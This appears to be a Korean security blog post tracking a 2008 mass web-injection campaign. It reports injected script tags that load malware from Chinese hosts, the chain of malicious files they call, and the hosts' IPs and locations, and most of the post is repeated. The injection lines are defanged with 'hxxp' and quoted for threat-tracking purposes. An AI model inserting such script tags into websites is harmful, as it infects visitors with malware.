# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다.
ririwow 가 wow 를 무지하고 싶은가 보다. 솔직히 주말에는 너도 쉴 줄 알았는데, 아니었구나~
<script src=hxxp://www.wowyeye.cn/m.js></script> 로 삽입하는 사례
Googling : 86건 KR도메인 : 5건, 미차단
<script src=hxxp://9i5t.cn/a.js></script>
Googling : 21건 KR도메인 : 0건, 미차단
m.js 는 기존의 m.js 와 동일
a.js 는 6.htm -> le.htm, vv.js, xin.htm, hxxp://winzipices.cn/old.gif 를 호출함
전부 well-known 한 Malware 임.
www.wowyeye.cn [221.12.88.52] (08-05-08 12:16, Hangzhou, CN)
9i5t.cn [116.11.32.41] (08-05-10 21:40, Nanning, CN) <-- 어제밤에 도메인 등록하고 오늘 공격?
61.188.38.158 (Chengdu, CN)
Nanning 은 베트남 바로 옆동네.
이번 공격 방식에서 116.11.32.41 는 처음 등장한 듯... le.htm, vv.js, xin.htm 도 이번 공격에서는 사용되지 않던 malware 임.
Chengdu 는 중국 서부지방이다.
이글루스 가든 - professional secur...
ririwow 가 wow 를 무지하고 싶은가 보다. 솔직히 주말에는 너도 쉴 줄 알았는데, 아니었구나~
<script src=hxxp://www.wowyeye.cn/m.js></script> 로 삽입하는 사례
Googling : 86건 KR도메인 : 5건, 미차단
<script src=hxxp://9i5t.cn/a.js></script>
Googling : 21건 KR도메인 : 0건, 미차단
m.js 는 기존의 m.js 와 동일
a.js 는 6.htm -> le.htm, vv.js, xin.htm, hxxp://winzipices.cn/old.gif 를 호출함
전부 well-known 한 Malware 임.
www.wowyeye.cn [221.12.88.52] (08-05-08 12:16, Hangzhou, CN)
9i5t.cn [116.11.32.41] (08-05-10 21:40, Nanning, CN) <-- 어제밤에 도메인 등록하고 오늘 공격?
61.188.38.158 (Chengdu, CN)
Nanning 은 베트남 바로 옆동네.
Chengdu 는 중국 서부지방이다.
이글루스 가든 - professional secur...
덧글